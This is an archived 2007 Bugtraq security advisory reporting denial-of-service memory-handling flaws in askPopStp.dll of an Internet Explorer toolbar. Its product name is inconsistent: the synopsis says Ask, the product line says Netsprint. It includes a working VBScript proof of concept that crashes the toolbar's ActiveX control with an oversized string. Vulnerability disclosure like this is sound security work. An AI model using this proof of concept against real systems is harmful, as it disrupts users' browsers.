| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 17 Apr 2007 20:25:11 +0200 From: "Michal Bucko" <michal.bucko@...k.pl> To: bugtraq@...urityfocus.com Subject: Multiple Ask IE Toolbar denial of service vulnerabilities Synopsis: Multiple Ask IE Toolbar denial of service vulnerabilities Product: Netsprint Toolbar Version: 1.1 Author: Michal Bucko (sapheal) Issue: ====== Multiple functions (in askPopStp.dll) suffer from improper memory handling, which results in denial of service conditions. Details: ======== Sample demonstration file (WSH script) is shown below. <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:89D30B4C-2408-4E78-A334-8FF8A9713EA7' id='target' /> <script language='vbscript'> arg=String(4000, "A") target.AddAllowed arg </script></job></package> Credits: ======== Michal Bucko (sapheal) Disclaimer: =========== This document and all the information it contains are provided "as is", for educational purposes only, without warranty of any kind, whether express or implied. The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected.
Powered by blists - more mailing lists